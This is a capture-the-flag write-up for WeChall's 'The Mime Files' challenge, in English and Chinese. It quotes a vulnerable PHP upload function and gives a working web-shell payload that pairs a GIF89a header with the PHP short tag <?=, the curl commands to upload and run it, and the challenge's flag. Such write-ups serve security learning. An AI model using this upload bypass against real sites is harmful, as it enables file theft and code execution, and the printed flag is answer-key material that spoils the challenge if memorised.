WeChall - The Mime Files

Challenge

The Mime Files (Exploit)

Hello Hacker, As you know, i am constantly developing great new websites. But this time, i am puzzled... Somehow, hackers broke into my new site "The Mime Files" and read the contents of solution.php. OUCH! Can you help me to find the vulnerability?

Source Code Analysis

Web app at https://themimefiles.warchall.net/ 是一个文件上传站点。

lib/upload.php — 核心上传逻辑:

1
2
3
4
5
6
7
8
9
10
11
12
13
function uploadFile(array $file)
{
$mime = mime_content_type($file['tmp_name']);
if (strpos($mime, 'image') !== 0) // 检查 MIME 以 image 开头
return false;

$data = file_get_contents($file['tmp_name']);
if (stripos($data, '<?php') !== false) // 检查 PHP 代码
return false; // # This does not seem to help :/

$path = 'upload/' . session_id() . '/' . $file['name'];
rename($file['tmp_name'], $path);
}

Vulnerabilities

1. MIME 类型绕过: mime_content_type() 会根据文件头判断类型。添加 GIF 头可使文件被识别为 image/gif

2. PHP 代码检测绕过: stripos($data, '<?php') 只检测 <?php 字面串。使用 PHP 短标签 <?= 即可绕过 — 它完全不含 "php" 字符串。作者注释 # This does not seem to help :/ 也暗示了这个绕过。

3. 文件扩展名白嫖: 没有扩展名过滤,可直接上传 .php 文件。

Exploit

构造 payload 文件:

1
printf 'GIF89a<?= file_get_contents("../solution.php") ?>' > shell.php

GIF89a 头 → MIME check 通过 (image/gif) <?= 短标签 → PHP 检测绕过 .php 后缀 → Apache 以 PHP 执行

上传并访问:

1
2
3
4
5
6
7
curl -b "PHPSESSID=xxx" \
-F "mimefile=@shell.php;filename=shell.php" \
-F "upload=upload" \
https://themimefiles.warchall.net/upload.php

curl -b "PHPSESSID=xxx" \
https://themimefiles.warchall.net/upload/SESSION_ID/shell.php

返回:GIF89a<?php\n// GoodyearGoodeveGooday

Flag

GoodyearGoodeveGooday